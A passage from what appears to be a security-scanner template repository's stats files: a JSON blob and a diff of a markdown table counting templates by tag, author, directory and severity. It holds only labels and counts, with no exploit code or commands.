"jellyfin","count":2},{"name":"mail","count":2},{"name":"emerge","count":2},{"name":"cve2008","count":2},{"name":"sharepoint","count":2},{"name":"huawei","count":2},{"name":"voipmonitor","count":2},{"name":"hp","count":2},{"name":"sonicwall","count":2},{"name":"injection","count":2},{"name":"shellshock","count":2},{"name":"glassfish","count":2},{"name":"activemq","count":2},{"name":"xxljob","count":2},{"name":"rockmongo","count":2},{"name":"wmt","count":1},{"name":"apiman","count":1},{"name":"csrf","count":1},{"name":"netdata","count":1},{"name":"maccmsv10","count":1},{"name":"panos","count":1},{"name":"cloudflare","count":1},{"name":"74cms","count":1},{"name":"zcms","count":1},{"name":"spring","count":1},{"name":"nc2","count":1},{"name":"fastapi","count":1},{"name":"sitecore","count":1},{"name":"oscommerce","count":1},{"name":"tongda","count":1},{"name":"yii","count":1},{"name":"esmtp","count":1},{"name":"fastcgi","count":1},{"name":"majordomo2","count":1},{"name":"redwood","count":1},{"name":"wavemaker","count":1},{"name":"tapestry","count":1},{"name":"postgres","count":1},{"name":"ueditor","count":1},{"name":"erp-nc","count":1},{"name":"blackboard","count":1},{"name":"zend","count":1},{"name":"vsftpd","count":1},{"name":"expn","count":1},{"name":"checkpoint","count":1},{"name":"varnish","count":1},{"name":"viewpoint","count":1},{"name":"emc","count":1},{"name":"fortigates","count":1},{"name":"cors","count":1},{"name":"blind","count":1},{"name":"zzzcms","count":1},{"name":"circontrorl","count":1},{"name":"jenzabar","count":1},{"name":"scs","count":1},{"name":"lansweeper","count":1},{"name":"uwsgi","count":1},{"name":"alertmanager","count":1},{"name":"nexusdb","count":1},{"name":"cve2007","count":1},{"name":"wamp","count":1},{"name":"ssltls","count":1},{"name":"mpsec","count":1},{"name":"pyramid","count":1},{"name":"hortonworks","count":1},{"name":"sentry","count":1},{"name":"exchange","count":1},{"name":"visionhub","count":1},{"name":"synnefo","count":1},{"name":"mautic","count":1},{"name":"zm","count":1},{"name":"fortigate","count":1},{"name":"clusterengine","count":1},{"name":"myucms","count":1},{"name":"openerp","count":1},{"name":"servicedesk","count":1},{"name":"axis","count":1},{"name":"klog","count":1},{"name":"kong","count":1},{"name":"jitsi","count":1},{"name":"svnserve","count":1},{"name":"biometrics","count":1},{"name":"k8s","count":1},{"name":"wuzhicms","count":1},{"name":"ulterius","count":1},{"name":"hasura","count":1},{"name":"spf","count":1},{"name":"razor","count":1},{"name":"mdb","count":1},{"name":"optiLink","count":1},{"name":"turbocrm","count":1},{"name":"symfony","count":1},{"name":"itop","count":1},{"name":"idemia","count":1},{"name":"ruby","count":1},{"name":"ssl","count":1},{"name":"webmin","count":1},{"name":"kafdrop","count":1},{"name":"gloo","count":1},{"name":"dvwa","count":1},{"name":"socomec","count":1},{"name":"parentlink","count":1},{"name":"acme","count":1},{"name":"shopware","count":1},{"name":"st","count":1},{"name":"pgadmin","count":1},{"name":"lancom","count":1},{"name":"fuelcms","count":1},{"name":"netrc","count":1},{"name":"webmodule-ee","count":1},{"name":"kyan","count":1},{"name":"wifisky","count":1},{"name":"firebase","count":1},{"name":"phpunit","count":1},{"name":"primetek","count":1},{"name":"vscode","count":1},{"name":"clockwatch","count":1},{"name":"nuuo","count":1},{"name":"chinaunicom","count":1},{"name":"bruteforce","count":1},{"name":"tika","count":1},{"name":"jenkin","count":1},{"name":"mobileiron","count":1},{"name":"etouch","count":1},{"name":"sqlite","count":1},{"name":"proftpd","count":1},{"name":"rabbitmq","count":1},{"name":"bookstack","count":1},{"name":"javamelody","count":1},{"name":"gateone","count":1},{"name":"beanshell","count":1},{"name":"opensmtpd","count":1},{"name":"sco","count":1},{"name":"extractor","count":1},{"name":"zookeeper","count":1},{"name":"centos","count":1},{"name":"zarafa","count":1},{"name":"wp-theme","count":1},{"name":"ricoh","count":1},{"name":"enum","count":1},{"name":"feifeicms","count":1},{"name":"wooyun","count":1},{"name":"javafaces","count":1},{"name":"octobercms","count":1},{"name":"ntopng","count":1},{"name":"cgi","count":1},{"name":"grails","count":1},{"name":"clave","count":1},{"name":"duomicms","count":1},{"name":"xff","count":1},{"name":"memcached","count":1},{"name":"xdcms","count":1},{"name":"rubedo","count":1},{"name":"dotnet","count":1},{"name":"npm","count":1},{"name":"panabit","count":1},{"name":"plc","count":1},{"name":"upload","count":1},{"name":"monitorix","count":1},{"name":"salesforce","count":1},{"name":"wso2","count":1},{"name":"svn","count":1},{"name":"2014","count":1},{"name":"geddy","count":1},{"name":"nedi","count":1},{"name":"gogs","count":1},{"name":"ecom","count":1},{"name":"linksys","count":1},{"name":"thinkadmin","count":1},{"name":"flink","count":1},{"name":"lanproxy","count":1},{"name":"comodo","count":1},{"name":"acexy","count":1},{"name":"finereport","count":1},{"name":"heroku","count":1},{"name":"episerver","count":1},{"name":"rmi","count":1},{"name":"tamronos","count":1},{"name":"calendarix","count":1},{"name":"moinmoin","count":1},{"name":"jfrog","count":1},{"name":"bitly","count":1},{"name":"tileserver","count":1},{"name":"fortiweb","count":1},{"name":"vsphere","count":1},{"name":"aura","count":1},{"name":"kubeflow","count":1},{"name":"druid","count":1},{"name":"aspnuke","count":1},{"name":"linkedin","count":1},{"name":"avalanche","count":1},{"name":"upnp","count":1},{"name":"glances","count":1},{"name":"phalcon","count":1},{"name":"rhymix","count":1},{"name":"tensorboard","count":1},{"name":"saltapi","count":1},{"name":"geutebruck","count":1},{"name":"floc","count":1},{"name":"cve2010","count":1},{"name":"appweb","count":1},{"name":"fedora","count":1},{"name":"csod","count":1},{"name":"selea","count":1},{"name":"pippoint","count":1},{"name":"jsf","count":1},{"name":"grav","count":1},{"name":"cobub","count":1},{"name":"akamai","count":1},{"name":"mirai","count":1},{"name":"netis","count":1},{"name":"alibaba","count":1},{"name":"wiki","count":1},{"name":"payara","count":1},{"name":"igs","count":1},{"name":"zeroshell","count":1},{"name":"gridx","count":1},{"name":"plone","count":1},{"name":"jnoj","count":1},{"name":"smartsense","count":1},{"name":"status","count":1},{"name":"fortinet","count":1},{"name":"mediumish","count":1},{"name":"krweb","count":1},{"name":"nordex","count":1},{"name":"tpshop","count":1},{"name":"huijietong","count":1},{"name":"k8","count":1},{"name":"stem","count":1},{"name":"phpinfo","count":1},{"name":"crm","count":1},{"name":"realteo","count":1},{"name":"empirecms","count":1},{"name":"hadoop","count":1},{"name":"spidercontrol","count":1},{"name":"ioncube","count":1},{"name":"fortilogger","count":1},{"name":"embedthis","count":1},{"name":"landrayoa","count":1},{"name":"opencast","count":1},{"name":"triconsole","count":1},{"name":"opentsdb","count":1},{"name":"webadmin","count":1},{"name":"trilithic","count":1},{"name":"seacms","count":1},{"name":"targa","count":1},{"name":"discourse","count":1},{"name":"interlib","count":1},{"name":"sprintful","count":1},{"name":"starttls","count":1},{"name":"pacsone","count":1},{"name":"dotnetnuke","count":1},{"name":"javascript","count":1},{"name":"dvr","count":1},{"name":"nsasg","count":1},{"name":"doh","count":1},{"name":"labtech","count":1},{"name":"emby","count":1},{"name":"mailchimp","count":1},{"name":"diris","count":1},{"name":"dom","count":1},{"name":"totaljs","count":1},{"name":"pulsesecure","count":1},{"name":"keenetic","count":1},{"name":"linkerd","count":1},{"name":"nette","count":1},{"name":"zte","count":1},{"name":"kerbynet","count":1},{"name":"mongoshake","count":1},{"name":"jsp","count":1},{"name":"shopxo","count":1},{"name":"azure","count":1},{"name":"codeigniter","count":1},{"name":"weiphp","count":1},{"name":"dompdf","count":1},{"name":"flash","count":1},{"name":"postmessage","count":1},{"name":"htmli","count":1},{"name":"avtech","count":1},{"name":"zimbra","count":1},{"name":"mongo","count":1},{"name":"plastic","count":1},{"name":"wazuh","count":1},{"name":"rfi","count":1},{"name":"soar","count":1},{"name":"gitlist","count":1},{"name":"woocomernce","count":1},{"name":"dlogin","count":1},{"name":"traefik","count":1},{"name":"goahead","count":1},{"name":"ns","count":1},{"name":"plugin","count":1},{"name":"lotuscms","count":1},{"name":"opensns","count":1},{"name":"anchorcms","count":1},{"name":"email","count":1},{"name":"eyou","count":1},{"name":"xunchi","count":1},{"name":"db","count":1},{"name":"redhat","count":1},{"name":"viewlinc","count":1},{"name":"landray","count":1},{"name":"zmanda","count":1},{"name":"backdoor","count":1},{"name":"mara","count":1},{"name":"timesheet","count":1},{"name":"nuxeo","count":1},{"name":"timeclock","count":1},{"name":"openstack","count":1},{"name":"domxss","count":1},{"name":"bullwark","count":1},{"name":"horde","count":1},{"name":"tensorflow","count":1},{"name":"liferay","count":1},{"name":"adminer","count":1},{"name":"alerta","count":1},{"name":"cse","count":1},{"name":"yachtcontrol","count":1},{"name":"rsyncd","count":1},{"name":"ilo4","count":1},{"name":"jeewms","count":1},{"name":"octoprint","count":1},{"name":"arl","count":1},{"name":"opm","count":1},{"name":"ems","count":1},{"name":"powercreator","count":1},{"name":"cve2005","count":1},{"name":"webui","count":1},{"name":"xml","count":1},{"name":"wildfly","count":1},{"name":"enumeration","count":1},{"name":"openrestry","count":1},{"name":"redis","count":1},{"name":"tenda","count":1},{"name":"mantisbt","count":1},{"name":"haproxy","count":1},{"name":"mysql","count":1},{"name":"springframework","count":1},{"name":"moin","count":1},{"name":"mcafee","count":1},{"name":"drone","count":1},{"name":"swagger","count":1},{"name":"b2evolution","count":1},{"name":"cloudinary","count":1},{"name":"favicon","count":1},{"name":"rdp","count":1},{"name":"skywalking","count":1},{"name":"robomongo","count":1},{"name":"harbor","count":1},{"name":"bolt","count":1},{"name":"servicenow","count":1},{"name":"codemeter","count":1},{"name":"jmx","count":1},{"name":"metinfo","count":1},{"name":"concrete","count":1},{"name":"cocoon","count":1},{"name":"setup","count":1},{"name":"rujjie","count":1},{"name":"spectracom","count":1},{"name":"node","count":1},{"name":"portainer","count":1},{"name":"ambari","count":1},{"name":"subrion","count":1},{"name":"rmc","count":1},{"name":"node-red-dashboard","count":1},{"name":"fiori","count":1},{"name":"faraday","count":1},{"name":"ec2","count":1},{"name":"bash","count":1},{"name":"nps","count":1},{"name":"netsweeper","count":1},{"name":"ganglia","count":1},{"name":"szhe","count":1},{"name":"sidekiq","count":1},{"name":"livezilla","count":1},{"name":"xiuno","count":1},{"name":"blue-ocean","count":1},{"name":"jquery","count":1},{"name":"darkstat","count":1},{"name":"discord","count":1},{"name":"sarg","count":1},{"name":"circontrol","count":1},{"name":"webftp","count":1},{"name":"nomad","count":1},{"name":"zenario","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":79},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":13},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"wdahlenb","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"melbadry9","count":7},{"name":"r3dg33k","count":7},{"name":"that_juan_","count":7},{"name":"dr_set","count":7},{"name":"oppsec","count":7},{"name":"techryptic (@tech)","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"puzzlepeaches","count":5},{"name":"ganofins","count":5},{"name":"caspergn","count":5},{"name":"panch0r3d","count":5},{"name":"github.com/its0x08","count":4},{"name":"meme-lord","count":4},{"name":"nodauf","count":4},{"name":"rootxharsh","count":4},{"name":"e_schultze_","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"fyoorer","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"joanbono","count":3},{"name":"kophjager007","count":3},{"name":"shine","count":3},{"name":"zomsop82","count":2},{"name":"udit_thakkur","count":2},{"name":"emenalf","count":2},{"name":"incogbyte","count":2},{"name":"lu4nx","count":2},{"name":"shifacyclewala","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"gevakun","count":2},{"name":"dheerajmadhukar","count":2},{"name":"jarijaas","count":2},{"name":"hetroublemakr","count":2},{"name":"0xsapra","count":2},{"name":"random-robbie","count":2},{"name":"ehsahil","count":2},{"name":"kiblyn11","count":2},{"name":"joeldeleep","count":2},{"name":"0xcrypto","count":2},{"name":"swissky","count":2},{"name":"0xelkomy","count":2},{"name":"mavericknerd","count":2},{"name":"moritz nentwig","count":2},{"name":"foulenzer","count":2},{"name":"ree4pwn","count":2},{"name":"0xprial","count":2},{"name":"davidmckennirey","count":2},{"name":"manas_harsh","count":2},{"name":"amsda","count":2},{"name":"pxmme1337","count":2},{"name":"elsfa7110","count":2},{"name":"vavkamil","count":2},{"name":"bsysop","count":2},{"name":"randomrobbie","count":2},{"name":"afaq","count":2},{"name":"0xrudra","count":2},{"name":"x1m_martijn","count":2},{"name":"unstabl3","count":2},{"name":"bp0lr","count":2},{"name":"lotusdll","count":2},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"iampritam","count":1},{"name":"fopina","count":1},{"name":"bjhulst","count":1},{"name":"akshansh","count":1},{"name":"geraldino2","count":1},{"name":"_harleo","count":1},{"name":"notsoevilweasel","count":1},{"name":"sy3omda","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"_c0wb0y_","count":1},{"name":"shifacyclewla","count":1},{"name":"0h1in9e","count":1},{"name":"mubassirpatel","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"j33n1k4","count":1},{"name":"thevillagehacker","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"knassar702","count":1},{"name":"becivells","count":1},{"name":"sullo","count":1},{"name":"vsh00t","count":1},{"name":"johnjhacking","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"th3.d1p4k","count":1},{"name":"manuelbua","count":1},{"name":"kabirsuda","count":1},{"name":"raesene","count":1},{"name":"bad5ect0r","count":1},{"name":"deena","count":1},{"name":"s1r1u5_","count":1},{"name":"willd96","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"0ut0fb4nd","count":1},{"name":"abison_binoy","count":1},{"name":"rojanrijal","count":1},{"name":"pdp","count":1},{"name":"rtcms","count":1},{"name":"qlkwej","count":1},{"name":"pudsec","count":1},{"name":"noamrathaus","count":1},{"name":"toufik airane","count":1},{"name":"alex","count":1},{"name":"zandros0","count":1},{"name":"@dwisiswant0","count":1},{"name":"0xtavian","count":1},{"name":"remonsec","count":1},{"name":"cookiehanhoan","count":1},{"name":"mhdsamx","count":1},{"name":"luskabol","count":1},{"name":"mohammedsaneem","count":1},{"name":"juicypotato1","count":1},{"name":"omarkurt","count":1},{"name":"sshell","count":1},{"name":"_generic_human_","count":1},{"name":"jeya seelan","count":1},{"name":"fmunozs","count":1},{"name":"nytr0gen","count":1},{"name":"kareemse1im","count":1},{"name":"blckraven","count":1},{"name":"exploitation","count":1},{"name":"52971","count":1},{"name":"dogasantos","count":1},{"name":"gboddin","count":1},{"name":"zhenwarx","count":1},{"name":"apt-mirror","count":1},{"name":"luci","count":1},{"name":"dawid czarnecki","count":1},{"name":"ilovebinbash","count":1},{"name":"yavolo","count":1},{"name":"fabaff","count":1},{"name":"0xrod","count":1},{"name":"affix","count":1},{"name":"yashgoti","count":1},{"name":"idealphase","count":1},{"name":"koti2","count":1},{"name":"tim_koopmans","count":1},{"name":"absshax","count":1},{"name":"kurohost","count":1},{"name":"andirrahmani1","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"b4uh0lz","count":1},{"name":"tirtha_mandal","count":1},{"name":"divya_mudgal","count":1},{"name":"johnk3r","count":1},{"name":"daviey","count":1},{"name":"its0x08","count":1},{"name":"c3l3si4n","count":1},{"name":"chron0x","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"furkansenan","count":1},{"name":"mah3sec_","count":1},{"name":"sicksec","count":1},{"name":"bolli95","count":1},{"name":"alph4byt3","count":1},{"name":"bing0o","count":1},{"name":"elmahdi","count":1},{"name":"_darrenmartyn","count":1},{"name":"shelld3v","count":1},{"name":"hanlaomo","count":1},{"name":"ipanda","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"ahmed sherif","count":1},{"name":"alperenkesk","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"defr0ggy","count":1},{"name":"streetofhackerr007","count":1},{"name":"undefl0w","count":1},{"name":"regala_","count":1},{"name":"akash.c","count":1},{"name":"naglinagli","count":1},{"name":"patralos","count":1},{"name":"hakluke","count":1},{"name":"ajaysenr","count":1},{"name":"ooooooo_q","count":1},{"name":"berkdusunur","count":1},{"name":"ohlinge","count":1},{"name":"soyelmago","count":1},{"name":"arcc","count":1},{"name":"schniggie","count":1},{"name":"gal nagli","count":1},{"name":"dudez","count":1},{"name":"whynotke","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"flag007","count":1},{"name":"micha3lb3n","count":1},{"name":"ldionmarcil","count":1},{"name":"vzamanillo","count":1},{"name":"taielab","count":1},{"name":"alifathi-h1","count":1},{"name":"shreyapohekar","count":1},{"name":"d0rkerdevil","count":1},{"name":"r3naissance","count":1},{"name":"rodnt","count":1},{"name":"ringo","count":1},{"name":"smaranchand","count":1},{"name":"sickwell","count":1},{"name":"wabafet","count":1},{"name":"w4cky_","count":1},{"name":"co0nan","count":1},{"name":"thezakman","count":1},{"name":"yashanand155","count":1},{"name":"nkxxkn","count":1}],"directory":[{"name":"cves","count":470},{"name":"vulnerabilities","count":232},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":395},{"name":"medium","count":313},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 2127d6d969..46d6b5181e 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -22,580 +22,580 @@ | file | 42 | cyllective | 11 | | | | | | | | unauth | 39 | random_robbie | 10 | | | | | | | | iot | 33 | righettod | 9 | | | | | | | -| network | 32 | iamthefrogy | 8 | | | | | | | +| network | 32 | wdahlenb | 8 | | | | | | | | sqli | 29 | hackergautam | 8 | | | | | | | -| oracle | 29 | wdahlenb | 8 | | | | | | | -| workflow | 28 | nadino | 8 | | | | | | | -| misc | 27 | aashiq | 8 | | | | | | | -| atlassian | 26 | randomstr1ng | 7 | | | | | | | -| jira | 25 | oppsec | 7 | | | | | | | -| ssrf | 25 | dr_set | 7 | | | | | | | -| oob | 24 | techryptic (@tech) | 7 | | | | | | | -| logs | 24 | r3dg33k | 7 | | | | | | | -| disclosure | 24 | that_juan_ | 7 | | | | | | | +| oracle | 29 | nadino | 8 | | | | | | | +| workflow | 28 | aashiq | 8 | | | | | | | +| misc | 27 | iamthefrogy | 8 | | | | | | | +| atlassian | 26 | harshbothra_ | 7 | | | | | | | +| ssrf | 25 | randomstr1ng | 7 | | | | | | | +| jira | 25 | techryptic (@tech) | 7 | | | | | | | +| disclosure | 24 | oppsec | 7 | | | | | | | +| oob | 24 | r3dg33k | 7 | | | | | | | +| logs | 24 | emadshanab | 7 | | | | | | | | redirect | 20 | 0x240x23elu | 7 | | | | | | | -| aem | 18 | melbadry9 | 7 | | | | | | | -| listing | 15 | emadshanab | 7 | | | | | | | -| cisco | 15 | harshbothra_ | 7 | | | | | | | -| cve2016 | 14 | philippedelteil | 6 | | | | | | | -| sap | 14 | __fazal | 6 | | | | | | | +| aem | 18 | dr_set | 7 | | | | | | | +| listing | 15 | that_juan_ | 7 | | | | | | | +| cisco | 15 | melbadry9 | 7 | | | | | | | +| sap | 14 | philippedelteil | 6 | | | | | | | +| cve2016 | 14 | __fazal | 6 | | | | | | | +| debug | 13 | yanyun | 5 | | | | | | | +| struts | 13 | panch0r3d | 5 | | | | | | | | misconfig | 13 | puzzlepeaches | 5 | | | | | | | -| fuzz | 13 | caspergn | 5 | | | | | | | -| cve2015 | 13 | panch0r3d | 5 | | | | | | | -| struts | 13 | pentest_swissky | 5 | | | | | | | -| debug | 13 | ganofins | 5 | | | | | | | -| android | 12 | yanyun | 5 | | | | | | | -| weblogic | 12 | github.com/its0x08 | 4 | | | | | | | -| auth-bypass | 11 | nodauf | 4 | | | | | | | -| springboot | 11 | e_schultze_ | 4 | | | | | | | -| zoho | 11 | meme-lord | 4 | | | | | | | -| dns | 11 | iamnoooob | 4 | | | | | | | -| cve2011 | 10 | rootxharsh | 4 | | | | | | | -| devops | 10 | xelkomy | 4 | | | | | | | -| jenkins | 9 | binaryfigments | 3 | | | | | | | -| dlink | 9 | fyoorer | 3 | | | | | | | -| cve2012 | 9 | f1tz | 3 | | | | | | | -| magento | 9 | 0w4ys | 3 | | | | | | | -| adobe | 8 | impramodsargar | 3 | | | | | | | -| ftp | 8 | shine | 3 | | | | | | | -| php | 8 | z3bd | 3 | | | | | | | -| airflow | 8 | thomas_from_offensity | 3 | | | | | | | -| aws | 8 | kophjager007 | 3 | | | | | | | -| cve2013 | 8 | joanbono | 3 | | | | | | | -| gitlab | 8 | yash anand @yashanand155 | 3 | | | | | | | -| cnvd | 8 | tess | 3 | | | | | | | -| cve2014 | 7 | hetroublemakr | 2 | | | | | | | -| joomla | 7 | mavericknerd | 2 | | | | | | | -| vmware | 7 | ree4pwn | 2 | | | | | | | -| scada | 7 | x1m_martijn | 2 | | | | | | | -| xxe | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| cms | 6 | incogbyte | 2 | | | | | | | -| backup | 6 | vavkamil | 2 | | | | | | | -| rails | 6 | gevakun | 2 | | | | | | | -| google | 6 | manas_harsh | 2 | | | | | | | -| api | 6 | afaq | 2 | | | | | | | -| nginx | 6 | random-robbie | 2 | | | | | | | -| citrix | 6 | kiblyn11 | 2 | | | | | | | -| rconfig | 6 | moritz nentwig | 2 | | | | | | | -| dell | 5 | amsda | 2 | | | | | | | -| login | 5 | lu4nx | 2 | | | | | | | -| phpmyadmin | 5 | bp0lr | 2 | | | | | | | -| iis | 5 | unstabl3 | 2 | | | | | | | -| ssti | 5 | lotusdll | 2 | | | | | | | -| confluence | 5 | dheerajmadhukar | 2 | | | | | | | -| jetty | 5 | udit_thakkur | 2 | | | | | | | -| headless | 5 | 0xcrypto | 2 | | | | | | | -| java | 5 | 0xrudra | 2 | | | | | | | -| solr | 5 | emenalf | 2 | | | | | | | -| lucee | 5 | elsfa7110 | 2 | | | | | | | -| circarlife | 5 | davidmckennirey | 2 | | | | | | | -| laravel | 5 | shifacyclewala | 2 | | | | | | | -| ruijie | 5 | swissky | 2 | | | | | | | -| drupal | 5 | jarijaas | 2 | | | | | | | -| jolokia | 4 | bsysop | 2 | | | | | | | -| artifactory | 4 | zomsop82 | 2 | | | | | | | -| hongdian | 4 | pxmme1337 | 2 | | | | | | | -| thinkcmf | 4 | 0xsapra | 2 | | | | | | | -| ibm | 4 | 0xelkomy | 2 | | | | | | | -| netgear | 4 | 0xprial | 2 | | | | | | | -| asp | 4 | joeldeleep | 2 | | | | | | | -| moodle | 4 | randomrobbie | 2 | | | | | | | -| vpn | 4 | foulenzer | 2 | | | | | | | -| traversal | 4 | ehsahil | 2 | | | | | | | -| nodejs | 4 | idealphase | 1 | | | | | | | -| tomcat | 4 | ajaysenr | 1 | | | | | | | -| webserver | 4 | bad5ect0r | 1 | | | | | | | -| elastic | 4 | chron0x | 1 | | | | | | | -| thinkphp | 4 | mhdsamx | 1 | | | | | | | -| samsung | 4 | alperenkesk | 1 | | | | | | | -| cve2009 | 4 | divya_mudgal | 1 | | | | | | | -| magmi | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| solarwinds | 4 | 0xrod | 1 | | | | | | | -| fileupload | 4 | remonsec | 1 | | | | | | | -| django | 4 | j3ssie/geraldino2 | 1 | | | | | | | -| docker | 4 | alifathi-h1 | 1 | | | | | | | -| router | 4 | omarkurt | 1 | | | | | | | -| mongodb | 3 | 52971 | 1 | | | | | | | -| backups | 3 | bolli95 | 1 | | | | | | | -| ssh | 3 | dogasantos | 1 | | | | | | | -| caucho | 3 | tirtha_mandal | 1 | | | | | | | -| windows | 3 | @dwisiswant0 | 1 | | | | | | | -| r-seenet | 3 | pdp | 1 | | | | | | | -| slack | 3 | notsoevilweasel | 1 | | | | | | | -| fanruan | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| nacos | 3 | w4cky_ | 1 | | | | | | | -| ebs | 3 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| openssh | 3 | ahmed sherif | 1 | | | | | | | -| bypass | 3 | rtcms | 1 | | | | | | | -| amazon | 3 | aceseven (digisec360) | 1 | | | | | | | -| lfr | 3 | jeya seelan | 1 | | | | | | | -| log | 3 | becivells | 1 | | | | | | | -| microstrategy | 3 | johnk3r | 1 | | | | | | | -| springcloud | 3 | streetofhackerr007 | 1 | | | | | | | -| fpd | 3 | mubassirpatel | 1 | | | | | | | -| terramaster | 3 | affix | 1 | | | | | | | -| deserialization | 3 | dudez | 1 | | | | | | | -| resin | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| oa | 3 | rojanrijal | 1 | | | | | | | -| grafana | 3 | hanlaomo | 1 | | | | | | | -| kafka | 3 | alph4byt3 | 1 | | | | | | | -| git | 3 | mohammedsaneem | 1 | | | | | | | -| dedecms | 3 | andirrahmani1 | 1 | | | | | | | -| crlf | 3 | ilovebinbash | 1 | | | | | | | -| ofbiz | 3 | whynotke | 1 | | | | | | | -| kubernetes | 3 | alex | 1 | | | | | | | -| nosqli | 3 | c3l3si4n | 1 | | | | | | | -| printer | 3 | taielab | 1 | | | | | | | -| vbulletin | 3 | cookiehanhoan | 1 | | | | | | | -| icewarp | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| nexus | 2 | abison_binoy | 1 | | | | | | | -| service | 2 | smaranchand | 1 | | | | | | | -| bigip | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| mail | 2 | akash.c | 1 | | | | | | | -| dos | 2 | juicypotato1 | 1 | | | | | | | -| smtp | 2 | luci | 1 | | | | | | | -| leak | 2 | nytr0gen | 1 | | | | | | | -| hashicorp | 2 | vsh00t | 1 | | | | | | | -| frp | 2 | j33n1k4 | 1 | | | | | | | -| mida | 2 | defr0ggy | 1 | | | | | | | -| splunk | 2 | bing0o | 1 | | | | | | | -| httpd | 2 | thezakman | 1 | | | | | | | -| kibana | 2 | deena | 1 | | | | | | | -| zhiyuan | 2 | sy3omda | 1 | | | | | | | -| saltstack | 2 | knassar702 | 1 | | | | | | | -| rockethchat | 2 | noamrathaus | 1 | | | | | | | -| maian | 2 | _harleo | 1 | | | | | | | -| globalprotect | 2 | sullo | 1 | | | | | | | -| kentico | 2 | zandros0 | 1 | | | | | | | -| exposures | 2 | apt-mirror | 1 | | | | | | | -| cve2008 | 2 | dawid czarnecki | 1 | | | | | | | -| intrusive | 2 | manuelbua | 1 | | | | | | | -| hp | 2 | naglinagli | 1 | | | | | | | -| rstudio | 2 | ooooooo_q | 1 | | | | | | | -| flir | 2 | fopina | 1 | | | | | | | -| plesk | 2 | regala_ | 1 | | | | | | | -| rockmongo | 2 | sicksec | 1 | | | | | | | -| yapi | 2 | pudsec | 1 | | | | | | | -| injection | 2 | wabafet | 1 | | | | | | | -| activemq | 2 | ratnadip gajbhiye | 1 | | | | | | | -| sonicwall | 2 | soyelmago | 1 | | | | | | | -| sonarqube | 2 | ipanda | 1 | | | | | | | -| jboss | 2 | patralos | 1 | | | | | | | -| fortios | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| openfire | 2 | 0h1in9e | 1 | | | | | | | -| pega | 2 | thevillagehacker | 1 | | | | | | | -| idrac | 2 | yashanand155 | 1 | | | | | | | -| nagios | 2 | gboddin | 1 | | | | | | | -| nextjs | 2 | flag007 | 1 | | | | | | | -| ecology | 2 | schniggie | 1 | | | | | | | -| cache | 2 | sickwell | 1 | | | | | | | -| chamilo | 2 | mah3sec_ | 1 | | | | | | | -| paloalto | 2 | fabaff | 1 | | | | | | | -| hjtcloud | 2 | sshell | 1 | | | | | | | -| strapi | 2 | @github.com/defr0ggy | 1 | | | | | | | -| ucmdb | 2 | yashgoti | 1 | | | | | | | -| bitrix | 2 | s1r1u5_ | 1 | | | | | | | -| xxljob | 2 | _c0wb0y_ | 1 | | | | | | | -| sharepoint | 2 | absshax | 1 | | | | | | | -| voipmonitor | 2 | kareemse1im | 1 | | | | | | | -| showdoc | 2 | micha3lb3n | 1 | | | | | | | -| natshell | 2 | shifacyclewla | 1 | | | | | | | -| glassfish | 2 | toufik 